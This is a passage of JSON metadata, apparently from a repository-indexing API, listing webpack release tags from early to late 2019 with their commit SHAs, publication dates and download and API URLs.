7a33a4c0c87604d8ec","kind":"tag","published_at":"2019-09-13T14:29:49.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.40.2","html_url":"https://github.com/webpack/webpack/releases/tag/v4.40.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.40.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.40.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.40.2/manifests"},{"name":"v4.40.1","sha":"e4c7d8c0ae0c93306f07920bc28fe72119bc098a","kind":"tag","published_at":"2019-09-13T07:07:19.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.40.1","html_url":"https://github.com/webpack/webpack/releases/tag/v4.40.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.40.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.40.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.40.1/manifests"},{"name":"v4.40.0","sha":"9c6b36787fe43581d6c568e64b71656274c04881","kind":"tag","published_at":"2019-09-12T18:52:45.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.40.0","html_url":"https://github.com/webpack/webpack/releases/tag/v4.40.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.40.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.40.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.40.0/manifests"},{"name":"v5.0.0-alpha.26","sha":"77ef20c1e3e57149053588785f69a69a41f542fc","kind":"tag","published_at":"2019-09-08T20:58:03.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.0.0-alpha.26","html_url":"https://github.com/webpack/webpack/releases/tag/v5.0.0-alpha.26","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.0.0-alpha.26","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-alpha.26","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-alpha.26/manifests"},{"name":"v5.0.0-alpha.25","sha":"332a14596af7a5792b7b041aeb0cd7544a509c37","kind":"tag","published_at":"2019-09-06T13:37:00.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.0.0-alpha.25","html_url":"https://github.com/webpack/webpack/releases/tag/v5.0.0-alpha.25","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.0.0-alpha.25","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-alpha.25","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-alpha.25/manifests"},{"name":"v5.0.0-alpha.24","sha":"7c7c96d18c410f6cd4bf15db26650309661c75ea","kind":"tag","published_at":"2019-09-05T12:13:17.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.0.0-alpha.24","html_url":"https://github.com/webpack/webpack/releases/tag/v5.0.0-alpha.24","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.0.0-alpha.24","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-alpha.24","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-alpha.24/manifests"},{"name":"v5.0.0-alpha.23","sha":"4a88ea6de08677d4538201605408b42bdaa9c8c7","kind":"tag","published_at":"2019-08-27T17:17:43.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.0.0-alpha.23","html_url":"https://github.com/webpack/webpack/releases/tag/v5.0.0-alpha.23","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.0.0-alpha.23","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-alpha.23","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-alpha.23/manifests"},{"name":"v4.39.3","sha":"94929a59a79bc79cab789804d5592c3ec0605cc4","kind":"tag","published_at":"2019-08-27T12:08:30.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.39.3","html_url":"https://github.com/webpack/webpack/releases/tag/v4.39.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.39.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.39.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.39.3/manifests"},{"name":"v5.0.0-alpha.22","sha":"4bd900e790611f32431d46ec4af559bc90d267ff","kind":"tag","published_at":"2019-08-23T13:16:16.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.0.0-alpha.22","html_url":"https://github.com/webpack/webpack/releases/tag/v5.0.0-alpha.22","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.0.0-alpha.22","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-alpha.22","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-alpha.22/manifests"},{"name":"v5.0.0-alpha.21","sha":"2a7f242968c2597fb9b955645fe7f4b57b61d62e","kind":"tag","published_at":"2019-08-22T19:01:31.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.0.0-alpha.21","html_url":"https://github.com/webpack/webpack/releases/tag/v5.0.0-alpha.21","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.0.0-alpha.21","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-alpha.21","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-alpha.21/manifests"},{"name":"v5.0.0-alpha.20","sha":"8e1ea8385d10c13c15c79eb9c4146e071ef8d565","kind":"tag","published_at":"2019-08-14T08:21:08.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.0.0-alpha.20","html_url":"https://github.com/webpack/webpack/releases/tag/v5.0.0-alpha.20","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.0.0-alpha.20","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-alpha.20","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-alpha.20/manifests"},{"name":"v4.39.2","sha":"7265427acf9cd4f0f36f05c1ba16a0abedb7bbc1","kind":"tag","published_at":"2019-08-13T17:45:58.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.39.2","html_url":"https://github.com/webpack/webpack/releases/tag/v4.39.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.39.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.39.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.39.2/manifests"},{"name":"v5.0.0-alpha.19","sha":"1aefa1116b7d54e445e606aa4cffb3a4ec82cd7a","kind":"tag","published_at":"2019-08-06T14:37:02.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.0.0-alpha.19","html_url":"https://github.com/webpack/webpack/releases/tag/v5.0.0-alpha.19","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.0.0-alpha.19","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-alpha.19","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-alpha.19/manifests"},{"name":"v4.39.1","sha":"f29445d46624ef4726465e27bbe6e003aa07f8be","kind":"tag","published_at":"2019-08-02T12:35:47.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.39.1","html_url":"https://github.com/webpack/webpack/releases/tag/v4.39.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.39.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.39.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.39.1/manifests"},{"name":"v4.39.0","sha":"5344837ed67479b838ad07ff353919d41f5d2b9f","kind":"tag","published_at":"2019-08-01T15:30:00.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.39.0","html_url":"https://github.com/webpack/webpack/releases/tag/v4.39.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.39.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.39.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.39.0/manifests"},{"name":"v4.38.0","sha":"ae3db13d7db6dbcdc27f2f3095b532c60c9de1c9","kind":"tag","published_at":"2019-07-26T07:26:17.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.38.0","html_url":"https://github.com/webpack/webpack/releases/tag/v4.38.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.38.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.38.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.38.0/manifests"},{"name":"v4.37.0","sha":"04b0d6b4eaa0e18629998e28f795914291c34723","kind":"tag","published_at":"2019-07-23T09:34:49.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.37.0","html_url":"https://github.com/webpack/webpack/releases/tag/v4.37.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.37.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.37.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.37.0/manifests"},{"name":"v4.36.1","sha":"92caa5de066ded4232a119752bd5dde1497606ef","kind":"tag","published_at":"2019-07-17T13:58:24.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.36.1","html_url":"https://github.com/webpack/webpack/releases/tag/v4.36.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.36.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.36.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.36.1/manifests"},{"name":"v4.36.0","sha":"95d21bb39a1e700f28be776b300492c50a169fc7","kind":"tag","published_at":"2019-07-17T11:32:51.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.36.0","html_url":"https://github.com/webpack/webpack/releases/tag/v4.36.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.36.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.36.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.36.0/manifests"},{"name":"v5.0.0-alpha.18","sha":"9d05b680f02b7bdae81eff47a18f95d1f21ed053","kind":"tag","published_at":"2019-07-08T20:25:09.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.0.0-alpha.18","html_url":"https://github.com/webpack/webpack/releases/tag/v5.0.0-alpha.18","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.0.0-alpha.18","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-alpha.18","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-alpha.18/manifests"},{"name":"v4.35.3","sha":"4ec90ceba4206aeb91d4c0f7e12dc889d238001e","kind":"tag","published_at":"2019-07-08T13:53:26.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.35.3","html_url":"https://github.com/webpack/webpack/releases/tag/v4.35.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.35.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.35.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.35.3/manifests"},{"name":"v5.0.0-alpha.17","sha":"7ade38d01107be2f55277b61fb683341884cdc7c","kind":"tag","published_at":"2019-07-01T10:22:16.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.0.0-alpha.17","html_url":"https://github.com/webpack/webpack/releases/tag/v5.0.0-alpha.17","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.0.0-alpha.17","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-alpha.17","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-alpha.17/manifests"},{"name":"v4.35.2","sha":"bf3e869a423a60581dcb64e215b8d14403e997f2","kind":"tag","published_at":"2019-07-01T09:18:28.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.35.2","html_url":"https://github.com/webpack/webpack/releases/tag/v4.35.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.35.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.35.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.35.2/manifests"},{"name":"v4.35.1","sha":"569dd6a2d2e31f218578c79a4b25dfe61baf6c08","kind":"tag","published_at":"2019-07-01T09:07:01.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.35.1","html_url":"https://github.com/webpack/webpack/releases/tag/v4.35.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.35.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.35.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.35.1/manifests"},{"name":"v4.35.0","sha":"c3377ef76ec708ed9c55314e8386f438abea178c","kind":"tag","published_at":"2019-06-19T19:15:59.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.35.0","html_url":"https://github.com/webpack/webpack/releases/tag/v4.35.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.35.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.35.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.35.0/manifests"},{"name":"v5.0.0-alpha.16","sha":"56b8aa7006df3c7c9d6634dd11fc6a9f5bac9644","kind":"tag","published_at":"2019-06-14T13:25:41.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.0.0-alpha.16","html_url":"https://github.com/webpack/webpack/releases/tag/v5.0.0-alpha.16","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.0.0-alpha.16","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-alpha.16","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-alpha.16/manifests"},{"name":"v4.34.0","sha":"34c86675728430c0f41fe415dbbacf87b5a2875d","kind":"tag","published_at":"2019-06-12T23:10:00.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.34.0","html_url":"https://github.com/webpack/webpack/releases/tag/v4.34.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.34.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.34.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.34.0/manifests"},{"name":"v5.0.0-alpha.15","sha":"224daec09d68f17ef705eafc9ecafeb3fa7fd7a9","kind":"tag","published_at":"2019-06-05T16:38:22.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.0.0-alpha.15","html_url":"https://github.com/webpack/webpack/releases/tag/v5.0.0-alpha.15","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.0.0-alpha.15","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-alpha.15","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-alpha.15/manifests"},{"name":"v4.33.0","sha":"d45bec3518f53153287ff2cad3cfae9d2b248d9a","kind":"tag","published_at":"2019-06-04T19:32:46.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.33.0","html_url":"https://github.com/webpack/webpack/releases/tag/v4.33.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.33.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.33.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.33.0/manifests"},{"name":"v5.0.0-alpha.14","sha":"0037e7355a147cf0fe8df9c56f1b9515b1a87f88","kind":"tag","published_at":"2019-05-23T07:32:16.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.0.0-alpha.14","html_url":"https://github.com/webpack/webpack/releases/tag/v5.0.0-alpha.14","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.0.0-alpha.14","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-alpha.14","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-alpha.14/manifests"},{"name":"v4.32.2","sha":"5d3004cccd3dd5af2721c39a7a8a27b12b3d0c19","kind":"tag","published_at":"2019-05-22T23:11:19.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.32.2","html_url":"https://github.com/webpack/webpack/releases/tag/v4.32.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.32.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.32.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.32.2/manifests"},{"name":"v4.32.1","sha":"87fc33edbec46f721a2186194f2bc0c8fc14b464","kind":"tag","published_at":"2019-05-22T06:30:58.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.32.1","html_url":"https://github.com/webpack/webpack/releases/tag/v4.32.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.32.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.32.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.32.1/manifests"},{"name":"v5.0.0-alpha.13","sha":"8d05c28e9c679f77cd054a84e261525773092b06","kind":"tag","published_at":"2019-05-20T12:55:35.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.0.0-alpha.13","html_url":"https://github.com/webpack/webpack/releases/tag/v5.0.0-alpha.13","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.0.0-alpha.13","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-alpha.13","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-alpha.13/manifests"},{"name":"v4.32.0","sha":"bbe71d89cb7a8c1cc81ce1e17929d8de2260ff80","kind":"tag","published_at":"2019-05-20T09:53:56.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.32.0","html_url":"https://github.com/webpack/webpack/releases/tag/v4.32.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.32.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.32.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.32.0/manifests"},{"name":"v5.0.0-alpha.12","sha":"e72fed4877c59d6d842a3596328c6e045d2b5eca","kind":"tag","published_at":"2019-05-10T22:40:23.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.0.0-alpha.12","html_url":"https://github.com/webpack/webpack/releases/tag/v5.0.0-alpha.12","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.0.0-alpha.12","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-alpha.12","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-alpha.12/manifests"},{"name":"v4.31.0","sha":"2e1e1799b1fc56b68dbddbe8712ff6393654ccbd","kind":"tag","published_at":"2019-05-09T07:56:24.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.31.0","html_url":"https://github.com/webpack/webpack/releases/tag/v4.31.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.31.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.31.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.31.0/manifests"},{"name":"v4.30.0","sha":"b72b96a2bc5d2c7a308d0943567e0db191d3c358","kind":"tag","published_at":"2019-04-12T20:06:52.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.30.0","html_url":"https://github.com/webpack/webpack/releases/tag/v4.30.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.30.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.30.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.30.0/manifests"},{"name":"v4.29.6","sha":"685a0626cb10664133ef2fb2e2f9f4cb3971402a","kind":"tag","published_at":"2019-02-28T09:44:40.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.29.6","html_url":"https://github.com/webpack/webpack/releases/tag/v4.29.6","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.29.6","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.29.6","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.29.6/manifests"},{"name":"v5.0.0-alpha.11","sha":"589e4e4d9d42401d638c442e5b83bb28213b614a","kind":"tag","published_at":"2019-02-19T10:50:24.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.0.0-alpha.11","html_url":"https://github.com/webpack/webpack/releases/tag/v5.0.0-alpha.11","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.0.0-alpha.11","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-alpha.11","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-alpha.11/manifests"},{"name":"v4.29.5","sha":"073813f1913e000302be557272b2d11195f9c2e6","kind":"tag","published_at":"2019-02-18T10:05:10.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.29.5","html_url":"https://github.com/webpack/webpack/releases/tag/v4.29.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.29.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.29.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.29.5/manifests"},{"name":"v4.29.4","sha":"7ecf992bd97204fbfaeed18e3e21fb9fcd46352f","kind":"tag","published_at":"2019-02-15T15:10:06.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.29.4","html_url":"https://github.com/webpack/webpack/releases/tag/v4.29.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.29.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.29.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.29.4/manifests"},{"name":"v5.0.0-alpha.10","sha":"2d7338d2b5cc70c6bd250a878d8a9717cc02cb95","kind":"tag","published_at":"2019-02-07T08:49:33.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.0.0-alpha.10","html_url":"https://github.com/webpack/webpack/releases/tag/v5.0.0-alpha.10","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.0.0-alpha.10","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-alpha.10","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-alpha.10/manifests"},{"name":"v4.29.3","sha":"b934e26da8b65bdf36b3c71141d0c2d8397d9f44","kind":"tag","published_at":"2019-02-07T08:22:10.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.29.3","html_url":"https://github.com/webpack/webpack/releases/tag/v4.29.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.29.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.29.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.29.3/manifests"},{"name":"v4.29.2","sha":"74b8aac0adfb0c79d70a99fa86635930db8944fd","kind":"tag","published_at":"2019-02-06T14:05:27.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.29.2","html_url":"https://github.com/webpack/webpack/releases/tag/v4.29.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.29.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.29.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.29.2/manifests"},{"name":"v4.29.1","sha":"6934b9814492b049e67efb3ccf7254d8917e01f9","kind":"tag","published_at":"2019-02-04T17:01:31.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.29.1","html_url":"https://github.com/webpack/webpack/releases/tag/v4.29.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.29.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.29.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.29.1/manifests"},{"name":"v5.0.0-alpha.9","sha":"92a36b1a9c0ed554c0f7e74bf1bc98c77a768fcc","kind":"tag","published_at":"2019-01-27T12:18:39.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.0.0-alpha.9","html_url":"https://github.com/webpack/webpack/releases/tag/v5.0.0-alpha.9","dependencies_parsed_at":nul